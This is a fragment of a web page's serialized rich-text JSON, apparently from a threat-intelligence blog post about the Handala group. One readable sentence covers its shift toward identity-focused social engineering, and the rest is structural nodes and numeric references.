threat ecosystem has been moving, even though it departs from Handala's own documented TTPs. Many of Handala's previous methods — targeting managed service providers and IT vendors, malware spearphishing, VPN credential stuffing — can also be repurposed in identity-focused social engineering attacks, particularly when boosted with widely available tools already powering criminal campaigns.",[],{},"Handala blog insight box 3",{"sys":10811,"__typename":9827,"type":9828,"ctaText":9829,"buttonLabel":9830,"buttonColour":9831,"buttonUrl":66},{"id":9489},{"items":10813},[10814],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":10815},{"url":2269},{"items":10817},[10818,11646,12394],{"__typename":1278,"sys":10819,"content":10820,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":11636,"authorsCollection":11642},{"id":1280},{"json":10821},{"nodeType":1259,"data":10822,"content":10823},{},[10824,10830,10836,10842,10845,10852,10858,10864,10869,10875,10880,10896,10902,10912,10915,10922,10928,10941,10947,10957,10962,10965,10972,10979,10984,10992,11008,11016,11022,11030,11045,11053,11059,11067,11093,11101,11107,11115,11131,11136,11144,11150,11158,11191,11194,11201,11209,11225,11233,11239,11247,11273,11278,11286,11292,11297,11300,11307,11315,11321,11372,11377,11380,11387,11395,11401,11406,11409,11416,11422,11428,11488,11494,11549,11555,11558,11565,11571,11577,11582,11585,11592,11598,11604,11610],{"nodeType":1258,"data":10825,"content":10826},{},[10827],{"nodeType":1257,"value":1289,"marks":10828,"data":10829},[],{},{"nodeType":1258,"data":10831,"content":10832},{},[10833],{"nodeType":1257,"value":1296,"marks":10834,"data":10835},[],{},{"nodeType":1258,"data":10837,"content":10838},{},[10839],{"nodeType":1257,"value":1303,"marks":10840,"data":10841},[],{},{"nodeType":1307,"data":10843,"content":10844},{},[],{"nodeType":1311,"data":10846,"content":10847},{},[10848],{"nodeType":1257,"value":1315,"marks":10849,"data":10851},[10850],{"type":1318},{},{"nodeType":1258,"data":10853,"content":10854},{},[10855],{"nodeType":1257,"value":1324,"marks":10856,"data":10857},[],{},{"nodeType":1258,"data":10859,"content":10860},{},[10861],{"nodeType":1257,"value":1331,"marks":10862,"data":10863},[],{},{"nodeType":1335,"data":10865,"content":10868},{"target":10866},{"sys":10867},{"id":1339,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10870,"content":10871},{},[10872],{"nodeType":1257,"value":1347,"marks":10873,"data":10874},[],{},{"nodeType":1335,"data":10876,"content":10879},{"target":10877},{"sys":10878},{"id":1354,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10881,"content":10882},{},[10883,10886,10893],{"nodeType":1257,"value":1360,"marks":10884,"data":10885},[],{},{"nodeType":1364,"data":10887,"content":10888},{"uri":1366},[10889],{"nodeType":1257,"value":1369,"marks":10890,"data":10892},[10891],{"type":1372},{},{"nodeType":1257,"value":1375,"marks":10894,"data":10895},[],{},{"nodeType":1258,"data":10897,"content":10898},{},[10899],{"nodeType":1257,"value":1382,"marks":10900,"data":10901},[],{},{"nodeType":1258,"data":10903,"content":10904},{},[10905,10908],{"nodeType":1257,"value":1389,"marks":10906,"data":10907},[],{},{"nodeType":1257,"value":1393,"marks":10909,"data":10911},[10910],{"type":1318},{},{"nodeType":1307,"data":10913,"content":10914},{},[],{"nodeType":1311,"data":10916,"content":10917},{},[10918],{"nodeType":1257,"value":1404,"marks":10919,"data":10921},[10920],{"type":1318},{},{"nodeType":1258,"data":10923,"content":10924},{},[10925],{"nodeType":1257,"value":1412,"marks":10926,"data":10927},[],{},{"nodeType":1258,"data":10929,"content":10930},{},[10931,10934,10938],{"nodeType":1257,"value":1419,"marks":10932,"data":10933},[],{},{"nodeType":1257,"value":1423,"marks":10935,"data":10937},[10936],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":10939,"data":10940},[],{},{"nodeType":1258,"data":10942,"content":10943},{},[10944],{"nodeType":1257,"value":1435,"marks":10945,"data":10946},[],{},{"nodeType":1258,"data":10948,"content":10949},{},[10950,10953],{"nodeType":1257,"value":1442,"marks":10951,"data":10952},[],{},{"nodeType":1257,"value":1446,"marks":10954,"data":10956},[10955],{"type":1318},{},{"nodeType":1335,"data":10958,"content":10961},{"target":10959},{"sys":10960},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":10963,"content":10964},{},[],{"nodeType":1311,"data":10966,"content":10967},{},[10968],{"nodeType":1257,"value":1463,"marks":10969,"data":10971},[10970],{"type":1318},{},{"nodeType":1468,"data":10973,"content":10974},{},[10975],{"nodeType":1257,"value":1472,"marks":10976,"data":10978},[10977],{"type":1318},{},{"nodeType":1335,"data":10980,"content":10983},{"target":10981},{"sys":10982},{"id":1480,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10985,"content":10986},{},[10987],{"nodeType":1257,"value":1486,"marks":10988,"data":10991},[10989,10990],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":10993,"content":10994},{},[10995,10998,11005],{"nodeType":1257,"value":1495,"marks":10996,"data":10997},[],{},{"nodeType":1364,"data":10999,"content":11000},{"uri":1500},[11001],{"nodeType":1257,"value":1503,"marks":11002,"data":11004},[11003],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":11006,"data":11007},[],{},{"nodeType":1258,"data":11009,"content":11010},{},[11011],{"nodeType":1257,"value":1515,"marks":11012,"data":11015},[11013,11014],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11017,"content":11018},{},[11019],{"nodeType":1257,"value":1524,"marks":11020,"data":11021},[],{},{"nodeType":1258,"data":11023,"content":11024},{},[11025],{"nodeType":1257,"value":1531,"marks":11026,"data":11029},[11027,11028],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11031,"content":11032},{},[11033,11036,11042],{"nodeType":1257,"value":1540,"marks":11034,"data":11035},[],{},{"nodeType":1364,"data":11037,"content":11038},{"uri":1545},[11039],{"nodeType":1257,"value":1548,"marks":11040,"data":11041},[],{},{"nodeType":1257,"value":1552,"marks":11043,"data":11044},[],{},{"nodeType":1258,"data":11046,"content":11047},{},[11048],{"nodeType":1257,"value":1559,"marks":11049,"data":11052},[11050,11051],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11054,"content":11055},{},[11056],{"nodeType":1257,"value":1568,"marks":11057,"data":11058},[],{},{"nodeType":1258,"data":11060,"content":11061},{},[11062],{"nodeType":1257,"value":1575,"marks":11063,"data":11066},[11064,11065],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11068,"content":11069},{},[11070,11073,11080,11083,11090],{"nodeType":1257,"value":1584,"marks":11071,"data":11072},[],{},{"nodeType":1364,"data":11074,"content":11075},{"uri":1589},[11076],{"nodeType":1257,"value":1592,"marks":11077,"data":11079},[11078],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":11081,"data":11082},[],{},{"nodeType":1364,"data":11084,"content":11085},{"uri":1602},[11086],{"nodeType":1257,"value":1605,"marks":11087,"data":11089},[11088],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":11091,"data":11092},[],{},{"nodeType":1258,"data":11094,"content":11095},{},[11096],{"nodeType":1257,"value":1617,"marks":11097,"data":11100},[11098,11099],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11102,"content":11103},{},[11104],{"nodeType":1257,"value":1626,"marks":11105,"data":11106},[],{},{"nodeType":1258,"data":11108,"content":11109},{},[11110],{"nodeType":1257,"value":1633,"marks":11111,"data":11114},[11112,11113],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11116,"content":11117},{},[11118,11121,11128],{"nodeType":1257,"value":1642,"marks":11119,"data":11120},[],{},{"nodeType":1364,"data":11122,"content":11123},{"uri":1602},[11124],{"nodeType":1257,"value":1605,"marks":11125,"data":11127},[11126],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":11129,"data":11130},[],{},{"nodeType":1335,"data":11132,"content":11135},{"target":11133},{"sys":11134},{"id":1660,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11137,"content":11138},{},[11139],{"nodeType":1257,"value":1666,"marks":11140,"data":11143},[11141,11142],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11145,"content":11146},{},[11147],{"nodeType":1257,"value":1675,"marks":11148,"data":11149},[],{},{"nodeType":1258,"data":11151,"content":11152},{},[11153],{"nodeType":1257,"value":1682,"marks":11154,"data":11157},[11155,11156],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11159,"content":11160},{},[11161,11164,11170,11173,11179,11182,11188],{"nodeType":1257,"value":1691,"marks":11162,"data":11163},[],{},{"nodeType":1364,"data":11165,"content":11166},{"uri":1696},[11167],{"nodeType":1257,"value":1699,"marks":11168,"data":11169},[],{},{"nodeType":1257,"value":1703,"marks":11171,"data":11172},[],{},{"nodeType":1364,"data":11174,"content":11175},{"uri":1708},[11176],{"nodeType":1257,"value":1711,"marks":11177,"data":11178},[],{},{"nodeType":1257,"value":1715,"marks":11180,"data":11181},[],{},{"nodeType":1364,"data":11183,"content":11184},{"uri":1720},[11185],{"nodeType":1257,"value":1723,"marks":11186,"data":11187},[],{},{"nodeType":1257,"value":1727,"marks":11189,"data":11190},[],{},{"nodeType":1307,"data":11192,"content":11193},{},[],{"nodeType":1468,"data":11195,"content":11196},{},[11197],{"nodeType":1257,"value":1737,"marks":11198,"data":11200},[11199],{"type":1318},{},{"nodeType":1258,"data":11202,"content":11203},{},[11204],{"nodeType":1257,"value":1745,"marks":11205,"data":11208},[11206,11207],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11210,"content":11211},{},[11212,11215,11222],{"nodeType":1257,"value":1754,"marks":11213,"data":11214},[],{},{"nodeType":1364,"data":11216,"content":11217},{"uri":1759},[11218],{"nodeType":1257,"value":1762,"marks":11219,"data":11221},[11220],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":11223,"data":11224},[],{},{"nodeType":1258,"data":11226,"content":11227},{},[11228],{"nodeType":1257,"value":1774,"marks":11229,"data":11232},[11230,11231],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11234,"content":11235},{},[11236],{"nodeType":1257,"value":1783,"marks":11237,"data":11238},[],{},{"nodeType":1258,"data":11240,"content":11241},{},[11242],{"nodeType":1257,"value":1790,"marks":11243,"data":11246},[11244,11245],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11248,"content":11249},{},[11250,11253,11260,11263,11270],{"nodeType":1257,"value":1799,"marks":11251,"data":11252},[],{},{"nodeType":1364,"data":11254,"content":11255},{"uri":1804},[11256],{"nodeType":1257,"value":1807,"marks":11257,"data":11259},[11258],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":11261,"data":11262},[],{},{"nodeType":1364,"data":11264,"content":11265},{"uri":1817},[11266],{"nodeType":1257,"value":1820,"marks":11267,"data":11269},[11268],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":11271,"data":11272},[],{},{"nodeType":1335,"data":11274,"content":11277},{"target":11275},{"sys":11276},{"id":1832,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11279,"content":11280},{},[11281],{"nodeType":1257,"value":1838,"marks":11282,"data":11285},[11283,11284],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11287,"content":11288},{},[11289],{"nodeType":1257,"value":1847,"marks":11290,"data":11291},[],{},{"nodeType":1335,"data":11293,"content":11296},{"target":11294},{"sys":11295},{"id":1854,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11298,"content":11299},{},[],{"nodeType":1468,"data":11301,"content":11302},{},[11303],{"nodeType":1257,"value":1863,"marks":11304,"data":11306},[11305],{"type":1318},{},{"nodeType":1258,"data":11308,"content":11309},{},[11310],{"nodeType":1257,"value":1871,"marks":11311,"data":11314},[11312,11313],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11316,"content":11317},{},[11318],{"nodeType":1257,"value":1880,"marks":11319,"data":11320},[],{},{"nodeType":1884,"data":11322,"content":11323},{},[11324,11337,11350],{"nodeType":1888,"data":11325,"content":11326},{},[11327],{"nodeType":1258,"data":11328,"content":11329},{},[11330,11334],{"nodeType":1257,"value":1895,"marks":11331,"data":11333},[11332],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":11335,"data":11336},[],{},{"nodeType":1888,"data":11338,"content":11339},{},[11340],{"nodeType":1258,"data":11341,"content":11342},{},[11343,11347],{"nodeType":1257,"value":1910,"marks":11344,"data":11346},[11345],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":11348,"data":11349},[],{},{"nodeType":1888,"data":11351,"content":11352},{},[11353],{"nodeType":1258,"data":11354,"content":11355},{},[11356,11360,11363,11369],{"nodeType":1257,"value":1925,"marks":11357,"data":11359},[11358],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":11361,"data":11362},[],{},{"nodeType":1364,"data":11364,"content":11365},{"uri":1935},[11366],{"nodeType":1257,"value":1938,"marks":11367,"data":11368},[],{},{"nodeType":1257,"value":1942,"marks":11370,"data":11371},[],{},{"nodeType":1335,"data":11373,"content":11376},{"target":11374},{"sys":11375},{"id":1949,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11378,"content":11379},{},[],{"nodeType":1468,"data":11381,"content":11382},{},[11383],{"nodeType":1257,"value":1958,"marks":11384,"data":11386},[11385],{"type":1318},{},{"nodeType":1258,"data":11388,"content":11389},{},[11390],{"nodeType":1257,"value":1966,"marks":11391,"data":11394},[11392,11393],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11396,"content":11397},{},[11398],{"nodeType":1257,"value":1975,"marks":11399,"data":11400},[],{},{"nodeType":1335,"data":11402,"content":11405},{"target":11403},{"sys":11404},{"id":1982,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11407,"content":11408},{},[],{"nodeType":1311,"data":11410,"content":11411},{},[11412],{"nodeType":1257,"value":1991,"marks":11413,"data":11415},[11414],{"type":1318},{},{"nodeType":1258,"data":11417,"content":11418},{},[11419],{"nodeType":1257,"value":1999,"marks":11420,"data":11421},[],{},{"nodeType":1258,"data":11423,"content":11424},{},[11425],{"nodeType":1257,"value":2006,"marks":11426,"data":11427},[],{},{"nodeType":1884,"data":11429,"content":11430},{},[11431,11450,11469],{"nodeType":1888,"data":11432,"content":11433},{},[11434],{"nodeType":1258,"data":11435,"content":11436},{},[11437,11440,11447],{"nodeType":1257,"value":2019,"marks":11438,"data":11439},[],{},{"nodeType":1364,"data":11441,"content":11442},{"uri":2024},[11443],{"nodeType":1257,"value":2027,"marks":11444,"data":11446},[11445],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11448,"data":11449},[],{},{"nodeType":1888,"data":11451,"content":11452},{},[11453],{"nodeType":1258,"data":11454,"content":11455},{},[11456,11459,11466],{"nodeType":1257,"value":2042,"marks":11457,"data":11458},[],{},{"nodeType":1364,"data":11460,"content":11461},{"uri":2047},[11462],{"nodeType":1257,"value":2050,"marks":11463,"data":11465},[11464],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11467,"data":11468},[],{},{"nodeType":1888,"data":11470,"content":11471},{},[11472],{"nodeType":1258,"data":11473,"content":11474},{},[11475,11478,11485],{"nodeType":1257,"value":2064,"marks":11476,"data":11477},[],{},{"nodeType":1364,"data":11479,"content":11480},{"uri":2069},[11481],{"nodeType":1257,"value":2072,"marks":11482,"data":11484},[11483],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11486,"data":11487},[],{},{"nodeType":1258,"data":11489,"content":11490},{},[11491],{"nodeType":1257,"value":2083,"marks":11492,"data":11493},[],{},{"nodeType":1884,"data":11495,"content":11496},{},[11497,11510,11523,11536],{"nodeType":1888,"data":11498,"content":11499},{},[11500],{"nodeType":1258,"data":11501,"content":11502},{},[11503,11507],{"nodeType":1257,"value":2096,"marks":11504,"data":11506},[11505],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":11508,"data":11509},[],{},{"nodeType":1888,"data":11511,"content":11512},{},[11513],{"nodeType":1258,"data":11514,"content":11515},{},[11516,11520],{"nodeType":1257,"value":2111,"marks":11517,"data":11519},[11518],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":11521,"data":11522},[],{},{"nodeType":1888,"data":11524,"content":11525},{},[11526],{"nodeType":1258,"data":11527,"content":11528},{},[11529,11533],{"nodeType":1257,"value":2126,"marks":11530,"data":11532},[11531],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":11534,"data":11535},[],{},{"nodeType":1888,"data":11537,"content":11538},{},[11539],{"nodeType":1258,"data":11540,"content":11541},{},[11542,11546],{"nodeType":1257,"value":2141,"marks":11543,"data":11545},[11544],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":11547,"data":11548},[],{},{"nodeType":1258,"data":11550,"content":11551},{},[11552],{"nodeType":1257,"value":2153,"marks":11553,"data":11554},[],{},{"nodeType":1307,"data":11556,"content":11557},{},[],{"nodeType":1311,"data":11559,"content":11560},{},[11561],{"nodeType":1257,"value":2163,"marks":11562,"data":11564},[11563],{"type":1318},{},{"nodeType":1258,"data":11566,"content":11567},{},[11568],{"nodeType":1257,"value":2171,"marks":11569,"data":11570},[],{},{"nodeType":1258,"data":11572,"content":11573},{},[11574],{"nodeType":1257,"value":2178,"marks":11575,"data":11576},[],{},{"nodeType":1335,"data":11578,"content":11581},{"target":11579},{"sys":11580},{"id":2185,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11583,"content":11584},{},[],{"nodeType":1311,"data":11586,"content":11587},{},[11588],{"nodeType":1257,"value":2194,"marks":11589,"data":11591},[11590],{"type":1318},{},{"nodeType":1258,"data":11593,"content":11594},{},[11595],{"nodeType":1257,"value":2202,"marks":11596,"data":11597},[],{},{"nodeType":1258,"data":11599,"content":11600},{},[11601],{"nodeType":1257,"value":2209,"marks":11602,"data":11603},[],{},{"nodeType":1258,"data":11605,"content":11606},{},[11607],{"nodeType":1257,"value":2216,"marks":11608,"data":11609},[],{},{"nodeType":1258,"data":11611,"content":11612},{},[11613,11616,11623,11626,11633],{"nodeType":1257,"value":2223,"marks":11614,"data":11615},[],{},{"nodeType":1364,"data":11617,"content":11618},{"uri":2228},[11619],{"nodeType":1257,"value":2231,"marks":11620,"data":11622},[11621],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":11624,"data":11625},[],{},{"nodeType":1364,"data":11627,"content":11628},{"uri":2241},[11629],{"nodeType":1257,"value":2244,"marks":11630,"data":11632},[11631],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":11634,"data":11635},[],{},{"items":11637},[11638,11640],{"sys":11639,"name":1270},{"id":1269},{"sys":11641,"name":1274},{"id":1273},{"items":11643},[11644],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":11645},{"url":2269},{"__typename":1278,"sys":11647,"content":11648,"title":3125,"synopsis":3126,"hashTags":118,"publishedDate":3127,"slug":3128,"tagsCollection":12384,"authorsCollection":12390},{"id":2272},{"json":11649},{"nodeType":1259,"data":11650,"content":11651},{},[11652,11659,11665,11671,11677,11687,11693,11698,11703,11706,11713,11719,11725,11730,11746,11752,11757,11763,11768,11774,11813,11818,11823,11829,11835,11838,11845,11861,11867,11872,11888,11893,11909,11915,11918,11925,11931,11967,11977,11980,11987,12002,12008,12021,12027,12033,12038,12044,12047,12054,12060,12108,12114,12117,12124,12129,12135,12141,12146,12152,12181,12187,12193,12198,12204,12209,12216,12232,12238,12268,12274,12304,12307,12314,12320,12325,12341,12347,12373,12378],{"nodeType":1311,"data":11653,"content":11654},{},[11655],{"nodeType":1257,"value":2281,"marks":11656,"data":11658},[11657],{"type":1318},{},{"nodeType":1258,"data":11660,"content":11661},{},[11662],{"nodeType":1257,"value":2289,"marks":11663,"data":11664},[],{},{"nodeType":1258,"data":11666,"content":11667},{},[11668],{"nodeType":1257,"value":2296,"marks":11669,"data":11670},[],{},{"nodeType":1258,"data":11672,"content":11673},{},[11674],{"nodeType":1257,"value":2303,"marks":11675,"data":11676},[],{},{"nodeType":1258,"data":11678,"content":11679},{},[11680,11684],{"nodeType":1257,"value":2310,"marks":11681,"data":11683},[11682],{"type":1318},{},{"nodeType":1257,"value":2315,"marks":11685,"data":11686},[],{},{"nodeType":1258,"data":11688,"content":11689},{},[11690],{"nodeType":1257,"value":2322,"marks":11691,"data":11692},[],{},{"nodeType":1335,"data":11694,"content":11697},{"target":11695},{"sys":11696},{"id":2329,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":11699,"content":11702},{"target":11700},{"sys":11701},{"id":2335,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11704,"content":11705},{},[],{"nodeType":1311,"data":11707,"content":11708},{},[11709],{"nodeType":1257,"value":2344,"marks":11710,"data":11712},[11711],{"type":1318},{},{"nodeType":1258,"data":11714,"content":11715},{},[11716],{"nodeType":1257,"value":2352,"marks":11717,"data":11718},[],{},{"nodeType":1258,"data":11720,"content":11721},{},[11722],{"nodeType":1257,"value":2359,"marks":11723,"data":11724},[],{},{"nodeType":1335,"data":11726,"content":11729},{"target":11727},{"sys":11728},{"id":2366,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11731,"content":11732},{},[11733,11736,11743],{"nodeType":1257,"value":2372,"marks":11734,"data":11735},[],{},{"nodeType":1364,"data":11737,"content":11738},{"uri":2377},[11739],{"nodeType":1257,"value":2380,"marks":11740,"data":11742},[11741],{"type":1372},{},{"nodeType":1257,"value":2385,"marks":11744,"data":11745},[],{},{"nodeType":1258,"data":11747,"content":11748},{},[11749],{"nodeType":1257,"value":2392,"marks":11750,"data":11751},[],{},{"nodeType":1335,"data":11753,"content":11756},{"target":11754},{"sys":11755},{"id":2399,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11758,"content":11759},{},[11760],{"nodeType":1257,"value":2405,"marks":11761,"data":11762},[],{},{"nodeType":1335,"data":11764,"content":11767},{"target":11765},{"sys":11766},{"id":2412,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11769,"content":11770},{},[11771],{"nodeType":1257,"value":2418,"marks":11772,"data":11773},[],{},{"nodeType":1884,"data":11775,"content":11776},{},[11777,11786,11795,11804],{"nodeType":1888,"data":11778,"content":11779},{},[11780],{"nodeType":1258,"data":11781,"content":11782},{},[11783],{"nodeType":1257,"value":2431,"marks":11784,"data":11785},[],{},{"nodeType":1888,"data":11787,"content":11788},{},[11789],{"nodeType":1258,"data":11790,"content":11791},{},[11792],{"nodeType":1257,"value":2441,"marks":11793,"data":11794},[],{},{"nodeType":1888,"data":11796,"content":11797},{},[11798],{"nodeType":1258,"data":11799,"content":11800},{},[11801],{"nodeType":1257,"value":2451,"marks":11802,"data":11803},[],{},{"nodeType":1888,"data":11805,"content":11806},{},[11807],{"nodeType":1258,"data":11808,"content":11809},{},[11810],{"nodeType":1257,"value":2461,"marks":11811,"data":11812},[],{},{"nodeType":1335,"data":11814,"content":11817},{"target":11815},{"sys":11816},{"id":2468,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":11819,"content":11822},{"target":11820},{"sys":11821},{"id":2474,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11824,"content":11825},{},[11826],{"nodeType":1257,"value":2480,"marks":11827,"data":11828},[],{},{"nodeType":1258,"data":11830,"content":11831},{},[11832],{"nodeType":1257,"value":2487,"marks":11833,"data":11834},[],{},{"nodeType":1307,"data":11836,"content":11837},{},[],{"nodeType":1311,"data":11839,"content":11840},{},[11841],{"nodeType":1257,"value":2497,"marks":11842,"data":11844},[11843],{"type":1318},{},{"nodeType":1258,"data":11846,"content":11847},{},[11848,11851,11858],{"nodeType":1257,"value":2505,"marks":11849,"data":11850},[],{},{"nodeType":1364,"data":11852,"content":11853},{"uri":2510},[11854],{"nodeType":1257,"value":2513,"marks":11855,"data":11857},[11856],{"type":1372},{},{"nodeType":1257,"value":2518,"marks":11859,"data":11860},[],{},{"nodeType":1258,"data":11862,"content":11863},{},[11864],{"nodeType":1257,"value":2525,"marks":11865,"data":11866},[],{},{"nodeType":1335,"data":11868,"content":11871},{"target":11869},{"sys":11870},{"id":2532,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11873,"content":11874},{},[11875,11878,11885],{"nodeType":1257,"value":2538,"marks":11876,"data":11877},[],{},{"nodeType":1364,"data":11879,"content":11880},{"uri":2543},[11881],{"nodeType":1257,"value":2546,"marks":11882,"data":11884},[11883],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":11886,"data":11887},[],{},{"nodeType":1335,"data":11889,"content":11892},{"target":11890},{"sys":11891},{"id":2557,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11894,"content":11895},{},[11896,11899,11906],{"nodeType":1257,"value":2563,"marks":11897,"data":11898},[],{},{"nodeType":1364,"data":11900,"content":11901},{"uri":2568},[11902],{"nodeType":1257,"value":2571,"marks":11903,"data":11905},[11904],{"type":1372},{},{"nodeType":1257,"value":2576,"marks":11907,"data":11908},[],{},{"nodeType":1258,"data":11910,"content":11911},{},[11912],{"nodeType":1257,"value":2583,"marks":11913,"data":11914},[],{},{"nodeType":1307,"data":11916,"content":11917},{},[],{"nodeType":1311,"data":11919,"content":11920},{},[11921],{"nodeType":1257,"value":2593,"marks":11922,"data":11924},[11923],{"type":1318},{},{"nodeType":1258,"data":11926,"content":11927},{},[11928],{"nodeType":1257,"value":2601,"marks":11929,"data":11930},[],{},{"nodeType":1258,"data":11932,"content":11933},{},[11934,11937,11944,11947,11954,11957,11964],{"nodeType":1257,"value":2608,"marks":11935,"data":11936},[],{},{"nodeType":1364,"data":11938,"content":11939},{"uri":2613},[11940],{"nodeType":1257,"value":2616,"marks":11941,"data":11943},[11942],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":11945,"data":11946},[],{},{"nodeType":1364,"data":11948,"content":11949},{"uri":2625},[11950],{"nodeType":1257,"value":2628,"marks":11951,"data":11953},[11952],{"type":1372},{},{"nodeType":1257,"value":2633,"marks":11955,"data":11956},[],{},{"nodeType":1364,"data":11958,"content":11959},{"uri":2638},[11960],{"nodeType":1257,"value":2641,"marks":11961,"data":11963},[11962],{"type":1372},{},{"nodeType":1257,"value":2646,"marks":11965,"data":11966},[],{},{"nodeType":1258,"data":11968,"content":11969},{},[11970,11973],{"nodeType":1257,"value":2653,"marks":11971,"data":11972},[],{},{"nodeType":1257,"value":2657,"marks":11974,"data":11976},[11975],{"type":1318},{},{"nodeType":1307,"data":11978,"content":11979},{},[],{"nodeType":1311,"data":11981,"content":11982},{},[11983],{"nodeType":1257,"value":2668,"marks":11984,"data":11986},[11985],{"type":1318},{},{"nodeType":1258,"data":11988,"content":11989},{},[11990,11993,11999],{"nodeType":1257,"value":2676,"marks":11991,"data":11992},[],{},{"nodeType":1364,"data":11994,"content":11995},{"uri":2681},[11996],{"nodeType":1257,"value":2684,"marks":11997,"data":11998},[],{},{"nodeType":1257,"value":2688,"marks":12000,"data":12001},[],{},{"nodeType":1258,"data":12003,"content":12004},{},[12005],{"nodeType":1257,"value":2695,"marks":12006,"data":12007},[],{},{"nodeType":1258,"data":12009,"content":12010},{},[12011,12014,12018],{"nodeType":1257,"value":2702,"marks":12012,"data":12013},[],{},{"nodeType":1257,"value":2706,"marks":12015,"data":12017},[12016],{"type":1318},{},{"nodeType":1257,"value":2711,"marks":12019,"data":12020},[],{},{"nodeType":1258,"data":12022,"content":12023},{},[12024],{"nodeType":1257,"value":2718,"marks":12025,"data":12026},[],{},{"nodeType":1258,"data":12028,"content":12029},{},[12030],{"nodeType":1257,"value":2725,"marks":12031,"data":12032},[],{},{"nodeType":1335,"data":12034,"content":12037},{"target":12035},{"sys":12036},{"id":2732,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12039,"content":12040},{},[12041],{"nodeType":1257,"value":2738,"marks":12042,"data":12043},[],{},{"nodeType":1307,"data":12045,"content":12046},{},[],{"nodeType":1311,"data":12048,"content":12049},{},[12050],{"nodeType":1257,"value":2748,"marks":12051,"data":12053},[12052],{"type":1318},{},{"nodeType":1258,"data":12055,"content":12056},{},[12057],{"nodeType":1257,"value":2756,"marks":12058,"data":12059},[],{},{"nodeType":1884,"data":12061,"content":12062},{},[12063,12072,12081,12090,12099],{"nodeType":1888,"data":12064,"content":12065},{},[12066],{"nodeType":1258,"data":12067,"content":12068},{},[12069],{"nodeType":1257,"value":2769,"marks":12070,"data":12071},[],{},{"nodeType":1888,"data":12073,"content":12074},{},[12075],{"nodeType":1258,"data":12076,"content":12077},{},[12078],{"nodeType":1257,"value":2779,"marks":12079,"data":12080},[],{},{"nodeType":1888,"data":12082,"content":12083},{},[12084],{"nodeType":1258,"data":12085,"content":12086},{},[12087],{"nodeType":1257,"value":2789,"marks":12088,"data":12089},[],{},{"nodeType":1888,"data":12091,"content":12092},{},[12093],{"nodeType":1258,"data":12094,"content":12095},{},[12096],{"nodeType":1257,"value":2799,"marks":12097,"data":12098},[],{},{"nodeType":1888,"data":12100,"content":12101},{},[12102],{"nodeType":1258,"data":12103,"content":12104},{},[12105],{"nodeType":1257,"value":2809,"marks":12106,"data":12107},[],{},{"nodeType":1258,"data":12109,"content":12110},{},[12111],{"nodeType":1257,"value":2816,"marks":12112,"data":12113},[],{},{"nodeType":1307,"data":12115,"content":12116},{},[],{"nodeType":1311,"data":12118,"content":12119},{},[12120],{"nodeType":1257,"value":2826,"marks":12121,"data":12123},[12122],{"type":1318},{},{"nodeType":1335,"data":12125,"content":12128},{"target":12126},{"sys":12127},{"id":2834,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12130,"content":12131},{},[12132],{"nodeType":1257,"value":2840,"marks":12133,"data":12134},[],{},{"nodeType":1258,"data":12136,"content":12137},{},[12138],{"nodeType":1257,"value":2847,"marks":12139,"data":12140},[],{},{"nodeType":1335,"data":12142,"content":12145},{"target":12143},{"sys":12144},{"id":2854,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12147,"content":12148},{},[12149],{"nodeType":1257,"value":2860,"marks":12150,"data":12151},[],{},{"nodeType":1884,"data":12153,"content":12154},{},[12155,12168],{"no